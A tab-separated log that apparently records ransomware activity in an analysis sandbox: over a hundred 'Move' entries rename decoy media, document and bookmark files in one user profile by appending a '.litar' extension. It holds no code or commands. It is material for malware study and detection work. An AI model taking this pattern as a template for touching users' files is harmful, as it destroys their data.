Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\LJP4K.m4a.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\LJP4K.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\-Bnbr4EKB.m4a.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\-Bnbr4EKB.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\DD0VSBvifKy.wav.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\DD0VSBvifKy.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\mt-NxS9.m4a.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\mt-NxS9.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\_US29v3kaQayesknOB.wav.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\_US29v3kaQayesknOB.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\71f4 4SP91MVI3\pakuYqh.png.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\71f4 4SP91MVI3\pakuYqh.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\9I3wBfC.png.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\9I3wBfC.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\gXqHnWD.bmp.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\gXqHnWD.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\pWM7.png.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\pWM7.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\3J2ydx.jpg.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\3J2ydx.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\3uz9sjygz2I9u-5T7p.png.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\3uz9sjygz2I9u-5T7p.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\dbSz.png.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\dbSz.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\XHt9VP7ib.gif.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\XHt9VP7ib.gif	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\_iolZcQAgtC1ACM.png.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\_iolZcQAgtC1ACM.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\ampfWs0z5kbstxRZUv.png.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\ampfWs0z5kbstxRZUv.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\HAJ2zHK0.png.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\HAJ2zHK0.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\lJDyJz4X_LOUsSG.png.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\lJDyJz4X_LOUsSG.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\Xu0FJPBCEsMrFdRg0wfb.png.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\Xu0FJPBCEsMrFdRg0wfb.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\y0VZOX.jpg.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\y0VZOX.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\1XL3nUBpXBByeYM.avi.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\1XL3nUBpXBByeYM.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\bps8RA.avi.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\bps8RA.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\cpBN4K954GbZNf.mp4.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\cpBN4K954GbZNf.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\GpZ VRAn1yi_-.swf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\GpZ VRAn1yi_-.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\IiTufgt.mp4.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\IiTufgt.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\jXsioQ.swf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\jXsioQ.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\LV_qcOmmob.mkv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\LV_qcOmmob.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\mR73VRvHqMlHdz.mp4.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\mR73VRvHqMlHdz.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\s-v3cZbpeiJD1yTvhr.swf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\s-v3cZbpeiJD1yTvhr.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\UAJvNRac055.avi.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\UAJvNRac055.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\x6E1GbuOZBC_86.swf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\x6E1GbuOZBC_86.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\Zmx9tyz7RoVpEsv00H.flv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\Zmx9tyz7RoVpEsv00H.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\6ften7Ta9q8fR_DlLE.mp4.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\6ften7Ta9q8fR_DlLE.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\8ndf-ek48BAm.jpg.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\8ndf-ek48BAm.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\PkQ0fGsu5.csv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\PkQ0fGsu5.csv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\SGPp8BH7eiOdE.mp3.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\SGPp8BH7eiOdE.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\u5VpH1Gfjec38H3.jpg.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\u5VpH1Gfjec38H3.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\wCHfAt0k5.wav.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\wCHfAt0k5.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\-pPGVSgI.ppt.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\-pPGVSgI.ppt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\Dk-mCKfeMJ.xls.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\Dk-mCKfeMJ.xls	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\f7Iu.ppt.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\f7Iu.ppt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\hv8Rvu6GKv.ppt.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\hv8Rvu6GKv.ppt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\VoZWZdD.xls.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\VoZWZdD.xls	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\_-u6ogOGtJDh_andzkIr.odt.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\_-u6ogOGtJDh_andzkIr.odt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0X9H7M.ppt.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0X9H7M.ppt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\8RDB7k.doc.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\8RDB7k.doc	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\e6btBcfWeC9TI4.pps.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\e6btBcfWeC9TI4.pps	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\FtBJIQkicPBzsMWmM5J.rtf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\FtBJIQkicPBzsMWmM5J.rtf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\j3Zk5qyJiGa6pOh.odp.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\j3Zk5qyJiGa6pOh.odp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\0jha7Ez6BS.ods.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\0jha7Ez6BS.ods	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\6iJuvel1.odt.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\6iJuvel1.odt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\BR7Cji.doc.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\BR7Cji.doc	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\DQcA9QRfBGkKr w6.docx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\DQcA9QRfBGkKr w6.docx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\WAQy.xlsx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\WAQy.xlsx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\oJv-O\-RJ_rXnG1_.m4a.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\oJv-O\-RJ_rXnG1_.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\oJv-O\vDiwpl_QLurQQz6.mp3.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\oJv-O\vDiwpl_QLurQQz6.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\sHdKY9oX2.m4a.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\sHdKY9oX2.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\smH64uN0q8.wav.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\smH64uN0q8.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\v _P9.mp3.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\v _P9.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\ylebE_y3_yj.m4a.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\ylebE_y3_yj.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\NiLbAzC1YwUFTvZqU.wav.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\NiLbAzC1YwUFTvZqU.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\rqr FeHB_E8CueZs9.mp3.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\rqr FeHB_E8CueZs9.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\VpT_TcidUDkQuxNiXW9.mp3.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\VpT_TcidUDkQuxNiXW9.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\3mMy51V.wav.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\3mMy51V.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\L4TT06vVg0ef.m4a.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\L4TT06vVg0ef.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\WBMmCD2Hu9jcGCg.wav.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\WBMmCD2Hu9jcGCg.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\fQS43pyYf93X_Ex4mvdQ.jpg.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\fQS43pyYf93X_Ex4mvdQ.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\Mw3Rg1vX.bmp.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\Mw3Rg1vX.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\oWuD6cFhx.bmp.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\oWuD6cFhx.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\EfuTYTPiCx LOe.png.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\EfuTYTPiCx LOe.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\F1NPm.bmp.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\F1NPm.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\LyCXLD1At.png.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\LyCXLD1At.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\MFCCzusoQ99IUVZOnO.jpg.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\MFCCzusoQ99IUVZOnO.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\RzVVuYwX5ISIAY3GJCd.jpg.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\RzVVuYwX5ISIAY3GJCd.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\USjQB.bmp.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\USjQB.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\EVQWdEk.mp4.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\EVQWdEk.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\FktDzr_Il x_4yzD.flv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\FktDzr_Il x_4yzD.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\mmUH6saj5D04se1Ny.mkv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\mmUH6saj5D04se1Ny.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\v3vmN1a.flv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\v3vmN1a.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0cFh2o\4fiD3H F26C.csv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0cFh2o\4fiD3H F26C.csv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0cFh2o\FF1E_qOk_q3b2hS6Wq.odt.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0cFh2o\FF1E_qOk_q3b2hS6Wq.odt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\02kt3FBU.ots.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\02kt3FBU.ots	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\1rim73kXzbZdPVb.ppt.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\1rim73kXzbZdPVb.ppt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\GcIb4JtMTQ.ppt.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\GcIb4JtMTQ.ppt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\hxwsGGSX.odt.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\hxwsGGSX.odt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\QUfuVrMTFwGhP.odt.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\QUfuVrMTFwGhP.odt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\WPd8.docx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\WPd8.docx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\xdcv4NFG2H1C8.pdf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\xdcv4NFG2H1C8.pdf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\7fX2K\jx1kJWZdi iCE.mp3.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\7fX2K\jx1kJWZdi iCE.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\7fX2K\Si93eS7jq6X4SJC7vm61.mp3.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\7fX2K\Si93eS7jq6X4SJC7vm61.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\_IS6dQkXRiXDfJ5-\ISL0.mp3.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\_IS6dQkXRiXDfJ5-\ISL0.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\_IS6dQkXRiXDfJ5-\OIIPvpIKePb.wav.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\_IS6dQkXRiXDfJ5-\OIIPvpIKePb.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\X_INggXuIaYsOTYsJW7\4KoQgGe.jpg.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\X_INggXuIaYsOTYsJW7\4KoQgGe.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\X_INggXuIaYsOTYsJW7\MGGz-2Q618NkS r.gif.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\X_INggXuIaYsOTYsJW7\MGGz-2Q618NkS r.gif	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\8gCaS.mkv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\8gCaS.mkv	1	Fn
